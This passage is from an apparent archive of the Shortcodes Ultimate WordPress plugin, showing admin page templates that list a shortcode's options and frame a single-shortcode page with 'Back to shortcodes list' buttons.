				<h3>[<?php echo esc_html( su_get_shortcode_prefix() . $table['id'] ); ?>]</h3>
			<?php endif; ?>

			<?php if ( ! is_array( $table['atts'] ) || ! count( $table['atts'] ) ) : ?>
				<p class="description"><?php esc_html_e( 'This shortcode do not have options', 'shortcodes-ultimate' ); ?></p>
			<?php else : ?>

				<table class="widefat striped">

					<tr>
						<th><?php esc_html_e( 'Option name', 'shortcodes-ultimate' ); ?></th>
						<th><?php esc_html_e( 'Possible values', 'shortcodes-ultimate' ); ?></th>
						<th><?php esc_html_e( 'Default value', 'shortcodes-ultimate' ); ?></th>
					</tr>

					<?php foreach ( $table['atts'] as $attr_id => $attr ) : ?>
						<tr>
							<td style="max-width:360px">
								<strong><?php echo esc_html( $attr_id ); ?></strong><br>
								<small class="description"><?php echo $this->get_shortcode_description( $attr['desc'] ); ?></small>
							</td>
							<td><?php echo $this->get_possible_values( $attr ); ?></td>
							<td><?php echo $this->get_default_value( $attr ); ?></td>
						</tr>
					<?php endforeach; ?>

				</table>

			<?php endif; ?>

		</div>

	<?php endforeach; ?>

</div>
<!-- /Options section -->
pages/shortcodes-single.php000066600000001773151752624010012027 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<div id="su_admin_shortcodes" class="wrap su-admin-shortcodes">

	<h1><?php $this->the_page_title(); ?></h1>

	<div class="su-admin-shortcodes-single">

		<!-- "Go back" button -->
		<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-back">
			<a href="<?php echo esc_attr( $this->get_component_url() ); ?>" class="button">
				<span class="dashicons dashicons-arrow-left-alt"></span>
				<?php esc_html_e( 'Back to shortcodes list', 'shortcodes-ultimate' ); ?>
			</a>
		</div>
		<!-- /"Go back" button -->

		<?php $this->single_shortcode_page_content(); ?>

		<!-- "Go back" button -->
		<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-back">
			<a href="<?php echo esc_attr( $this->get_component_url() ); ?>" class="button">
				<span class="dashicons dashicons-arrow-left-alt"></span>
				<?php esc_html_e( 'Back to shortcodes list', 'shortcodes-ultimate' ); ?>
			</a>
		</div>
		<!-- /"Go back" button -->

	</div>

</div>